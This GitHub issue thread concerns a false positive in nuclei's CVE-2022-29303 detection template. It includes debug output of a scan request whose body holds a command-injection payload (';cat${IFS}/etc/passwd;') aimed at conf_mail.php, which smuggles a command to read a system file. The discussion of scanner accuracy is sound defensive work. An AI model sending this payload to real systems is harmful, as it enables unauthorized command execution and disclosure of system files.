Closed 0xPugal closed 10 months ago
Hi @0xPugazh i'm unable to replicate this issue
geekfreak@localhost ~ % nuclei -u https://abc.com -id CVE-2022-29303 -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.3
projectdiscovery.io
[INF] Current nuclei version: v3.0.3 (latest)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2022-29303] Dumped HTTP request for https://abc.com/conf_mail.php
POST /conf_mail.php HTTP/1.1
Host: abc.com
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M
[DBG] [CVE-2022-29303] Dumped HTTP response https://abc.com/conf_mail.php
HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 1053
Content-Type: text/html
Date: Tue, 14 Nov 2023 05:56:23 GMT
Server: CloudFront
Via: 1.1 efe084c020e92c5aaed2cec86751428c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KcPt12Vy9N1NqBgh8j7faDQAVjrWG1UVXr7JTpsJU90dsh3l6OcAKQ==
X-Amz-Cf-Pop: BOM54-P2
X-Cache: Error from cloudfront
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>403 ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
<BR clear="all">
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: KcPt12Vy9N1NqBgh8j7faDQAVjrWG1UVXr7JTpsJU90dsh3l6OcAKQ==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
Hey @DhiyaneshGeek i just use abc.com as target example
Hi @0xPugazh i have DM you on discord and twitter about this issue.
Looking forward to hear back from you
Thanks !
Hi @0xPugazh i have fixed the issue and raised PR #8676 , let me know if it looks good
Thanks
Hey, The CVE-2022-29303 in Nuclei often show critical Vulnerability. This looks like false positive. the matcher has
-"root:.*:0:0"
. but it doesn't return the content of/etc/passwd
. instead it shows some code in javascript file.Nuclei Version:
v3.0.3 (latest)
Template file:
http/cves/2022/CVE-2022-29303.yaml
Command to reproduce:
Anything else: